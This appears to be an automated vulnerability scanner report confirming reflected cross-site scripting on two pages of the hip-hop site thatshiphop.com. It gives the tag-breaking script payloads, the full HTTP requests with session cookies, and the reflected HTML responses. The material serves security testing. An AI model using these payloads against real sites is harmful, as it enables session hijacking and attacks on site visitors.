scrollbar-highlight-color : #666666;
scrollbar-3dlight-color : #4444444;
scrollbar-shadow-color : #111111;
scrollbar-darkshadow-color : #000000;
scrollbar-track-color : #555555;
scrollbar-arrow-color : #ffffff;
}
</style>
<script language="javascript" src="data/hiphop.js"></script>
<link href="/style.css" rel="stylesheet" type="text/css">
<link href="/newstyle.css" rel="stylesheet" type="text/css">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Music" href="/press/?feed=rss2&cat=4">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Videos" href="/press/?feed=rss2&cat=5">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml"
title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onResize="fixWidths()">
<center><table id="Table_01" width="877" height="616" border="0" cellpadding="0" cellspacing="0">
<tr>

<td height="614" rowspan="20" background="images/leftbg.gif">
<div id="lside" style="width:162px;height:614px;background-image:url(images/leftbg.gif);" width="162">
&nbsp;</div>
</td>
<td rowspan="7">
<img border="0" src="images/1_02.gif" width="30" height="112" alt=""></td>
<td width="1" height="116" rowspan="8" bgcolor="#EAC135">
<img border="0" src="images/spacer.gif" width="1" height="116" alt=""></td>
<td colspan="2">
<img border="0" src="images/1_04.gif" width="20" height="4" alt=""></td>
<td colspan="2">
<img border="0" src="images/1_05.gif" width="136" height="4" alt=""></td>
<td rowspan="9">
<img border="0" src="images/1_06.gif" width="10" height="117" alt=""></td>
<td colspan="23" rowspan="2">
<div style="margin:0px;width:642px;height:76px;padding:0px;overflow:hidden;">
<script type="text/javascript"><!--
google_ad_client = "pub-9643032735294668";
google_ad_width = 642;
google_ad_height = 76;
google_ad_format = "728x90_as";
google_ad_type = "image";
//2007-10-02: ThatsHiphop Top
google_ad_channel = "5799825340";
google_color_border = "111111";
google_color_bg = "111111";
google_color_link = "FFFF00";
google_color_text = "E6E6E6";
google_color_url = "FFFFFF";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div><!--
<img border="0" src="images/1_07.gif" width="642" height="76" alt="">--></td>
<td colspan="2" rowspan="13">
<img border="0" src="images/1_08.gif" width="11" height="133" alt=""></td>
<td rowspan="17">
<img border="0" src="images/1_09.gif" width="26" height="151" alt=""></td>

<!--<td width="162" height="614" rowspan="20" background="images/rightbg.gif">&nbsp;
</td>-->
<td height="614" rowspan="20" background="images/rightbg.gif">
<div id="rside" style="width:162px;height:614px;background-image:url(images/rightbg.gif);" width="162">
&nbsp;</div>
</td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="4" alt=""></td>
</tr>
<tr>
<td rowspan="15">
<img border="0" src="images/1_11.gif" width="19" height="146" alt=""></td>
<td colspan="3" rowspan="9">
<img border="0" src="images/1_12.gif" width="137" height="114" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="72" alt=""></td>
</tr>
<tr>
<td colspan="23">
<img border="0" src="images/1_13.gif" width="642" height="17" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="17" alt=""></td>
</tr>
<tr>
<td colspan="18">
<img border="0" src="images/1_14.gif" width="477" height="6" alt=""></td>
<td colspan="3" rowspan="7">
<a href="/models.php"><img border="0" src="images/1_15.gif" width="102" height="25"
alt="Models"></a></td>
<td rowspan="7">
<a href="/index.php?page=blogs_home"><img border="0" src="images/1_16.gif" width="56" height="25"
alt="Blogs"></a></td>
<td rowspan="10">
<img border="0" src="images/1_17.gif" width="7" height="40" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="6" alt=""></td>
</tr>
<tr>
<td colspan="14">
<img border="0" src="images/1_18.gif" width="361" height="5" alt=""></td>
<td rowspan="7">
<a href="/display_photos.php"><img border="0" src="images/1_19.gif" width="46" height="24"
alt="Photos"></a></td>
<td colspan="3" rowspan="7">
<a href="/interviews.php"><img border="0" src="images/1_20.gif" width="70" height="24" alt="Reviews"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td colspan="12">
<img border="0" src="images/1_21.gif" width="302" height="3" alt=""></td>
<td colspan="2" rowspan="7">
<a href="/index.php?page=music_home"><img border="0" src="images/1_22.gif" width="59" height="22"
alt="Artists"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="3" alt=""></td>
</tr>
<tr>
<td colspan="5">
<img border="0" src="images/1_23.gif" width="136" height="5" alt=""></td>
<td colspan="2" rowspan="8">
<a href="/index.php?page=videos_home"><img border="0" src="images/1_24.gif" width="57" height="27"
alt="Videos"></a></td>
<td colspan="2" rowspan="8">
<a href="/phpBB2/"><img border="0" src="images/1_25.gif" width="57" height="27" alt="Forum"></a></td>
<td colspan="3" rowspan="6">
<a href="/chat.php"><img border="0" src="images/1_26.gif" width="52" height="19" alt="Chatrooms"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td rowspan="10">
<img border="0" src="images/1_27.gif" width="30" height="39" alt=""></td>
<td colspan="3" rowspan="2">
<a href="/news.php"><img border="0" src="images/1_28.gif" width="78" height="5" alt=""></a></td>
<td colspan="2" rowspan="7">
<a href="/music.php"><img border="0" src="images/1_29.gif" width="58" height="22" alt="Music"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="4" alt=""></td>
</tr>
<tr>
<td rowspan="8">
<img border="0" src="images/1_30.gif" width="1" height="34" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td colspan="2" rowspan="5">
<a href="/index.php?page=index"><img border="0" src="images/1_31.gif" width="34" height="17"
alt="Home"></a></td>
<td colspan="2" rowspan="5">
<a href="/news.php"><img border="0" src="images/1_32.gif" width="54" height="17" alt="News"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td rowspan="6">
<img border="0" src="images/1_33.gif" width="1" height="32" alt=""></td>
<td rowspan="5">
<img border="0" src="images/1_34.gif" width="117" height="26" alt=""></td>
<td rowspan="4">
<img border="0" src="images/1_35.gif" width="19" height="16" alt=""></td>
<td>
<img border="0" src="images/1_36.gif" width="1" height="5" alt=""></td>
<td colspan="3" rowspan="3">
<img border="0" src="images/1_37.gif" width="157" height="15" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td colspan="5" rowspan="2">
<img border="0" src="images/1_38.gif" width="117" height="10" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="3" alt=""></td>
</tr>
<tr>
<td rowspan="2">
<img border="0" src="images/1_39.gif" width="1" height="8" alt=""></td>
<td colspan="4">
<img border="0" src="images/1_40.gif" width="110" height="7" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="7" alt=""></td>
</tr>
<tr>
<td rowspan="3">
<a href="/index.php?page=groups_home"><img border="0" src="images/1_41.gif" width="44" height="17" alt=""></a></td>
<td colspan="2" rowspan="3">
<a href="/index.php?page=events_home"><img border="0" src="images/1_42.gif" width="50" height="17" alt=""></a></td>
<td colspan="3" rowspan="3">
<a href="http://www.thatshiphop.com/phpBB2/viewforum.php?f=42"><img
border="0" src="images/1_43.gif" width="70" height="17" alt="Classifieds"></a></td>
<td rowspan="3">
<a href="/view_bulletins.php"><img border="0" src="images/1_44.gif" width="59" height="17" alt="Bulletins"></a></td>
<td colspan="3" rowspan="3">
<a href="/index.php?page=address_book"><img border="0" src="images/1_45.gif" width="91" height="17" alt="Address Book"></a></td>
<td colspan="4" rowspan="3">
<a href="/graffworld.php"><img border="0" src="images/1_46.gif" width="84" height="17" alt="Graffworld"></a></td>
<td rowspan="4">
<img border="0" src="images/1_47.gif" width="4" height="18" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td>
<img border="0" src="images/1_48.gif" width="19" height="10" alt=""></td>
<td colspan="3" rowspan="2">
<img border="0" src="images/1_49.gif" width="77" height="16" alt=""></td>
<td colspan="2" rowspan="2">
<a href="/index.php?page=home"><img border="0" src="images/1_50.gif" width="45" height="16" alt="Profile"></a></td>
<td colspan="2" rowspan="2">
<a href="/jbrowse.php"><img border="0" src="images/1_51.gif" width="56" height="16" alt="Browse"></a></td>
<td colspan="2" rowspan="2">
<a href="/bookmarks.php"><img border="0" src="images/1_52.gif" width="74" height="16" alt="Bookmarks"></a></td>
<td colspan="2" rowspan="2">
<img border="0" src="images/1_53.gif" width="9" height="16" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="10" alt=""></td>
</tr>
<tr>
<td colspan="2">
<img border="0" src="images/1_54.gif" width="136" height="6" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="6" alt=""></td>
</tr>
<tr>
<td colspan="30">
<img border="0" src="images/1_55.gif" width="816" height="1" alt=""></td>
<td>
<img border="0" src=&..
- /display_photos.php

/display_photos.php CONFIRMED

http://www.thatshiphop.com/display_photos.php?'"--></style></script><script>alert(0x000077)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000077)</script>

Request

GET /display_photos.php?'"--></style></script><script>netsparker(0x000077)</script> HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:11:03 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<html>
<head>
<title>Hip Hop, News, Honeys, Friends, Community, Exclusive Music, Upload Video, Hip Hop Interviews - Thats Hip Hop</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<style type="text/css">
body,td {
font-family:Verdana,Helvetica;
font-size:11px;
font-weight:normal;
color:white;
}
a:link {
color:yellow;
}
a:visited {
color:yellow;
}
a:hover {
color:white;
}
.topnews_text {
font-size:9px;
}
.topnews_text_header {
font-weight:bold;

}
.newmusic_text {
font-family:Verdana,Helvetica;
font-size:11px;
font-weight:bold;
color:black;
}
.topsongs_header {
font-weight:bold;
color: black;
}
body,div {
scrollbar-face-color : #333333;
scrollbar-highlight-color : #666666;
scrollbar-3dlight-color : #4444444;
scrollbar-shadow-color : #111111;
scrollbar-darkshadow-color : #000000;
scrollbar-track-color : #555555;
scrollbar-arrow-color : #ffffff;
}
</style>
<script language="javascript" src="data/hiphop.js"></script>
<link href="/style.css" rel="stylesheet" type="text/css">
<link href="/newstyle.css" rel="stylesheet" type="text/css">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Music" href="/press/?feed=rss2&cat=4">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Videos" href="/press/?feed=rss2&cat=5">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml"
title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml"
title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onResize="fixWidths()">
<center><table id="Table_01" width="877" height="616" border="0" cellpadding="0" cellspacing="0">
<tr>

<td height="614" rowspan="20" background="images/leftbg.gif">
<div id="lside" style="width:162px;height:614px;background-image:url(images/leftbg.gif);" width="162">
&nbsp;</div>
</td>
<td rowspan="7">
<img border="0" src="images/1_02.gif" width="30" height="112" alt=""></td>
<td width="1" height="116" rowspan="8" bgcolor="#EAC135">
<img border="0" src="images/spacer.gif" width="1" height="116" alt=""></td>
<td colspan="2">
<img border="0" src="images/1_04.gif" width="20" height="4" alt=""></td>
<td colspan="2">
<img border="0" src="images/1_05.gif" width="136" height="4" alt=""></td>
<td rowspan="9">
<img border="0" src="images/1_06.gif" width="10" height="117" alt=""></td>
<td colspan="23" rowspan="2">
<div style="margin:0px;width:642px;height:76px;padding:0px;overflow:hidden;">
<script type="text/javascript"><!--
google_ad_client = "pub-9643032735294668";
google_ad_width = 642;
google_ad_height = 76;
google_ad_format = "728x90_as";
google_ad_type = "image";
//2007-10-02: ThatsHiphop Top
google_ad_channel = "5799825340";
google_color_border = "111111";
google_color_bg = "111111";
google_color_link = "FFFF00";
google_color_text = "E6E6E6";
google_color_url = "FFFFFF";
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div><!--
<img border="0" src="images/1_07.gif" width="642" height="76" alt="">--></td>
<td colspan="2" rowspan="13">
<img border="0" src="images/1_08.gif" width="11" height="133" alt=""></td>
<td rowspan="17">
<img border="0" src="images/1_09.gif" width="26" height="151" alt=""></td>

<!--<td width="162" height="614" rowspan="20" background="images/rightbg.gif">&nbsp;
</td>-->
<td height="614" rowspan="20" background="images/rightbg.gif">
<div id="rside" style="width:162px;height:614px;background-image:url(images/rightbg.gif);" width="162">
&nbsp;</div>
</td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="4" alt=""></td>
</tr>
<tr>
<td rowspan="15">
<img border="0" src="images/1_11.gif" width="19" height="146" alt=""></td>
<td colspan="3" rowspan="9">
<img border="0" src="images/1_12.gif" width="137" height="114" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="72" alt=""></td>
</tr>
<tr>
<td colspan="23">
<img border="0" src="images/1_13.gif" width="642" height="17" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="17" alt=""></td>
</tr>
<tr>
<td colspan="18">
<img border="0" src="images/1_14.gif" width="477" height="6" alt=""></td>
<td colspan="3" rowspan="7">
<a href="/models.php"><img border="0" src="images/1_15.gif" width="102" height="25"
alt="Models"></a></td>
<td rowspan="7">
<a href="/index.php?page=blogs_home"><img border="0" src="images/1_16.gif" width="56" height="25"
alt="Blogs"></a></td>
<td rowspan="10">
<img border="0" src="images/1_17.gif" width="7" height="40" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="6" alt=""></td>
</tr>
<tr>
<td colspan="14">
<img border="0" src="images/1_18.gif" width="361" height="5" alt=""></td>
<td rowspan="7">
<a href="/display_photos.php"><img border="0" src="images/1_19.gif" width="46" height="24"
alt="Photos"></a></td>
<td colspan="3" rowspan="7">
<a href="/interviews.php"><img border="0" src="images/1_20.gif" width="70" height="24" alt="Reviews"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td colspan="12">
<img border="0" src="images/1_21.gif" width="302" height="3" alt=""></td>
<td colspan="2" rowspan="7">
<a href="/index.php?page=music_home"><img border="0" src="images/1_22.gif" width="59" height="22"
alt="Artists"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="3" alt=""></td>
</tr>
<tr>
<td colspan="5">
<img border="0" src="images/1_23.gif" width="136" height="5" alt=""></td>
<td colspan="2" rowspan="8">
<a href="/index.php?page=videos_home"><img border="0" src="images/1_24.gif" width="57" height="27"
alt="Videos"></a></td>
<td colspan="2" rowspan="8">
<a href="/phpBB2/"><img border="0" src="images/1_25.gif" width="57" height="27" alt="Forum"></a></td>
<td colspan="3" rowspan="6">
<a href="/chat.php"><img border="0" src="images/1_26.gif" width="52" height="19" alt="Chatrooms"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td rowspan="10">
<img border="0" src="images/1_27.gif" width="30" height="39" alt=""></td>
<td colspan="3" rowspan="2">
<a href="/news.php"><img border="0" src="images/1_28.gif" width="78" height="5" alt=""></a></td>
<td colspan="2" rowspan="7">
<a href="/music.php"><img border="0" src="images/1_29.gif" width="58" height="22" alt="Music"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="4" alt=""></td>
</tr>
<tr>
<td rowspan="8">
<img border="0" src="images/1_30.gif" width="1" height="34" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td colspan="2" rowspan="5">
<a href="/index.php?page=index"><img border="0" src="images/1_31.gif" width="34" height="17"
alt="Home"></a></td>
<td colspan="2" rowspan="5">
<a href="/news.php"><img border="0" src="images/1_32.gif" width="54" height="17" alt="News"></a></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td rowspan="6">
<img border="0" src="images/1_33.gif" width="1" height="32" alt=""></td>
<td rowspan="5">
<img border="0" src="images/1_34.gif" width="117" height="26" alt=""></td>
<td rowspan="4">
<img border="0" src="images/1_35.gif" width="19" height="16" alt=""></td>
<td>
<img border="0" src="images/1_36.gif" width="1" height="5" alt=""></td>
<td colspan="3" rowspan="3">
<img border="0" src="images/1_37.gif" width="157" height="15" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="5" alt=""></td>
</tr>
<tr>
<td colspan="5" rowspan="2">
<img border="0" src="images/1_38.gif" width="117" height="10" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="3" alt=""></td>
</tr>
<tr>
<td rowspan="2">
<img border="0" src="images/1_39.gif" width="1" height="8" alt=""></td>
<td colspan="4">
<img border="0" src="images/1_40.gif" width="110" height="7" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="7" alt=""></td>
</tr>
<tr>
<td rowspan="3">
<a href="/index.php?page=groups_home"><img border="0" src="images/1_41.gif" width="44" height="17" alt=""></a></td>
<td colspan="2" rowspan="3">
<a href="/index.php?page=events_home"><img border="0" src="images/1_42.gif" width="50" height="17" alt=""></a></td>
<td colspan="3" rowspan="3">
<a href="http://www.thatshiphop.com/phpBB2/viewforum.php?f=42"><img
border="0" src="images/1_43.gif" width="70" height="17" alt="Classifieds"></a></td>
<td rowspan="3">
<a href="/view_bulletins.php"><img border="0" src="images/1_44.gif" width="59" height="17" alt="Bulletins"></a></td>
<td colspan="3" rowspan="3">
<a href="/index.php?page=address_book"><img border="0" src="images/1_45.gif" width="91" height="17" alt="Address Book"></a></td>
<td colspan="4" rowspan="3">
<a href="/graffworld.php"><img border="0" src="images/1_46.gif" width="84" height="17" alt="Graffworld"></a></td>
<td rowspan="4">
<img border="0" src="images/1_47.gif" width="4" height="18" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="1" alt=""></td>
</tr>
<tr>
<td>
<img border="0" src="images/1_48.gif" width="19" height="10" alt=""></td>
<td colspan="3" rowspan="2">
<img border="0" src="images/1_49.gif" width="77" height="16" alt=""></td>
<td colspan="2" rowspan="2">
<a href="/index.php?page=home"><img border="0" src="images/1_50.gif" width="45" height="16" alt="Profile"></a></td>
<td colspan="2" rowspan="2">
<a href="/jbrowse.php"><img border="0" src="images/1_51.gif" width="56" height="16" alt="Browse"></a></td>
<td colspan="2" rowspan="2">
<a href="/bookmarks.php"><img border="0" src="images/1_52.gif" width="74" height="16" alt="Bookmarks"></a></td>
<td colspan="2" rowspan="2">
<img border="0" src="images/1_53.gif" width="9" height="16" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="10" alt=""></td>
</tr>
<tr>
<td colspan="2">
<img border="0" src="images/1_54.gif" width="136" height="6" alt=""></td>
<td>
<img border="0" src="images/spacer.gif" width="1" height="6" alt=""></td>
</tr>
<tr>
<td colspan="30">
<img border="0" src="images/1_55.gif" width="816" height="1" alt=""></td>
<td>
<img border="0" src=&..
- /interviews.php

/interviews.php CONFIRMED

http://www.thatshiphop.com/interviews.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x000079)</script>

Request

GET /interviews.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000079)%3C/script%3E HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:11:04 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community">
<meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!">
<meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" />
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
<script src="js/jquery.tools.min.js" type="text/javascript"></script>
<script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script>
<script src="js/home.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]-->
<title>ThatsHipHop.com - Interviews</title>
</head>

<body>
<div id="page">
<div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div>
<div id="main-wrapper">
<!-- LEFT SIDEBAR -->

<div id="content-left-wrapper">
<div id="content-left">
<div class="mod-left-wrap">
<div class="mod-left-inner">
<h2 class="title">ThatsHiphop.com Interviews</h2>
<div class="mod-left">
<tr>
<td class="table2left">&nbsp; </td>
<td class="table2bg" valign="top">
<table width='530' cellspacing='10' cellpadding='10'><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20962'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/03/large_amounts_the_best_of_large_amounts-front-large.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20962' style='font-weight:bold;color:yellow;'>Large Amount</a><br><br>
LARGE AMOUNT
“THE BOY WITH A BILLION BARS”
"The BOY WITH A BILLION BARS”, in which this unique title was also naturally recognized by his major influences of well-known rappers hailing from the streets of Yonkers, which include platinum reco... <a href='/interview.php?id=20962' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20742'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/grouphome.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20742' style='font-weight:bold;color:yellow;'>Group Home</a><br><br>
GROUP HOME
RSRadio: So group home itís been a few years since you have released an official album what made you decide that now was the right time?
GH: We have been in motion working on this project for a period of time. It is a passion for the music... <a href='/interview.php?id=20742' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20740'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/marsha_ambrosius-2.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20740' style='font-weight:bold;color:yellow;'>Marsha Ambrosius</a><br><br>'
Marsha Ambrosius
ALBUM: Late Nights &amp; Early Mornings
Release Date: January 4, 2011
SINGLE: Hope She Cheats on You (With a Basketball Player)
Download ONLINE NOW
Http://www.Rcamusicgroup.com/music/marsha-ambrosius/hope-she-cheats-you-basketb... <a href='/interview.php?id=20740' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=20738'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/01/cyhi-da-prince-main-pic.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=20738' style='font-weight:bold;color:yellow;'>Cyhi Da Prince</a><br><br>
CyHi Da Prince
Mixtape: Royal Flush
IN STORES/ONLINE NOW!!!
Konvict Muzikís debut artist, charismatic Southern rapper Cyhi da Prynce, began his industry ascendance as a member of Stone Mountain, Georgiaís infamous rap group, Hoodlum, a short-live... <a href='/interview.php?id=20738' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=19450'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/09/bluecollarcoverbig-put-above-intrview.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=19450' style='font-weight:bold;color:yellow;'>Thadd</a><br><br>
THADD
Mixtape: Blue Collar Code
Release Date: OUT NOW!!
Up Next: Blue Collar Code 1.5
Release date: TBA 4th quarter 2010
Born in South Carolina and reared in Virginia, Thaddeus Williams brings a rare palette of business acumen to the industry... <a href='/interview.php?id=19450' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=19072'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/romey_0927hires.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=19072' style='font-weight:bold;color:yellow;'>Romey</a><br><br>

ALBUM: I Am King
RELEASE DATE: Sept 2010

(This Album will be Available Online)

It’s hard to stand out in a city full of stars. But instead of being intimidated by all the hype surrounding the Windy City’s overnight celebrities, Romey is... <a href='/interview.php?id=19072' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18882'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/sarahgreen.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18882' style='font-weight:bold;color:yellow;'>Sarah Green</a><br><br>
Sarah Green
Mixtape: TBA
Release Date: TBA
Chicago is home to some of the finest talent in the music industry...Sarah Green is no exception. Sarah recognized her gift as a vocalist at the tender age of 6 when she started singing in her family c... <a href='/interview.php?id=18882' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18880'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/08/bigboi-banner-pic.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18880' style='font-weight:bold;color:yellow;'>Big Boi</a><br><br>
Big Boi
Album: Sir Lucious Left Foot: The Son of Chico Dusty
Release Date: In Stores NOW!
Antwan “Big Boi” Patton is a man of many hats but best known as half of Outkast. For a while their were rumors and discussions of a break up between ... <a href='/interview.php?id=18880' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/interview.php?id=18399'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2010/07/fat-joe-the-darkside-album-cover-above-interview.thumbnail.jpg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/interview.php?id=18399' style='font-weight:bold;color:yellow;'>Fat Joe</a><br><br>

Fat Joe

Album: The Darkside Vol. 1

